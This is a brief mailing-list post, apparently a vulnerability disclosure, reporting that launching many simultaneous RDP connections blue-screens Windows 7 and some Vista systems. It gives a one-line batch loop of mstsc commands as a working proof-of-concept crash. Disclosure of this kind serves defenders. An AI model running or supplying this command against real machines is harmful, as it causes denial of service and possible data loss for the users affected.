[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Multiple RDP Connections BSOD DOS



Creating multiple RDP connection at the same time causes Windows to
Blue Screen. Here is the Proof of Concept code.

for /L %i in (1,1,20) do mstsc /v:127.0.0.%i

It does work on Windows 7 and some Vista installations.
                      -Tim Medin